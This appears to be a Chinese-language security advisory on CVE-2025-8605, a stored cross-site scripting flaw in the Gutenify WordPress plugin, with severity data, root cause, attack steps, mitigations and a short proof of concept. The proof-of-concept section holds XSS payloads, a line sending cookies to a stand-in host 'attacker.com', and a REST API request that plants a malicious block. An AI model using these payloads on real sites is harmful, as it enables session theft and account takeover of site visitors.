CVE-2025-8605 Gutenify WordPress插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8605

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Gutenify – Visual Site Builder Blocks & Site Templates (WordPress插件)

漏洞概述

CVE-2025-8605是WordPress插件Gutenify中存在的一个存储型跨站脚本(XSS)安全漏洞。该插件是一款流行的可视化站点构建器，提供区块和站点模板功能。漏洞源于插件的区块属性处理过程中对用户输入的属性值缺乏充分的输入清理和输出转义。攻击者只需拥有WordPress网站的贡献者(Contributor)级别或更高权限，即可利用此漏洞在页面中注入任意JavaScript脚本代码。这些恶意脚本会被永久存储在数据库中，当其他用户访问包含恶意代码的页面时，脚本会自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。由于该插件被广泛应用于WordPress网站构建，具有一定的实际危害性。

技术细节

该漏洞的根本原因在于Gutenify插件在处理区块(block)属性时，未对用户提供的属性值进行充分的输入验证和清理。插件直接接收并存储用户输入的区块属性数据，在输出时也没有对特殊字符进行正确的HTML转义处理。攻击者可以在区块的某个属性中嵌入恶意的JavaScript代码，例如在data-*属性或其他可自定义的字段中插入<script>标签或事件处理器(如onerror、onload等)。当页面被渲染时，这些未转义的脚本代码会被浏览器执行。存储型XSS与反射型XSS的主要区别在于payload会永久保存在服务器端，每次有用户访问受感染页面时都会触发执行，大大增加了攻击的覆盖面和危害程度。攻击者利用此漏洞可窃取管理员Cookie、提升权限或进行进一步的内网渗透。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的Contributor或更高权限账户

STEP 2

步骤2

攻击者登录网站后台，进入文章/页面编辑器

STEP 3

步骤3

添加Gutenify插件提供的区块组件

STEP 4

步骤4

在区块的属性设置中注入恶意XSS payload，如<img src=x onerror=alert(1)>

STEP 5

步骤5

保存并发布文章，恶意脚本被永久存储在数据库中

STEP 6

步骤6

当其他用户访问该页面时，浏览器解析页面内容并执行注入的恶意JavaScript代码

STEP 7

步骤7

攻击者通过XSS成功窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-8605 Stored XSS PoC
// Target: Gutenify WordPress Plugin <= 1.5.9
// Attack Vector: Inject malicious JavaScript via block attributes

// Method 1: Via WordPress Block Editor
// 1. Login as Contributor or higher role
// 2. Create/Edit a post or page
// 3. Add a Gutenify block (e.g., Button, Heading, etc.)
// 4. In block settings, inject XSS payload in any text attribute field:
// Payload: <img src=x onerror=alert(document.cookie)>
// or: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
// 5. Save/Publish the post
// 6. Any user viewing this page will execute the injected script

// Method 2: REST API Exploitation (if available)
const payload = {
    'type': 'wp_block',
    'content': {
        'raw': '<!-- wp:gutenify/button {"text":"Click Me<img src=x onerror=alert(document.domain)>"} -->\n<div class="wp-block-gutenify-button">Button</div>\n<!-- /wp:gutenify/button -->'
    }
};

fetch('/wp-json/wp/v2/posts', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': wpApiSettings.nonce
    },
    body: JSON.stringify(payload)
});

影响范围

Gutenify插件所有版本 <= 1.5.9

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1)限制WordPress用户的编辑权限，仅允许管理员级别的用户使用Gutenify区块；2)安装WordPress安全插件(如Wordfence)添加额外的输入过滤层；3)启用浏览器的XSS过滤器功能；4)对所有用户输入的内容实施严格的类型检查和格式验证；5)考虑暂时禁用Gutenify插件，待官方发布修复版本后再重新启用。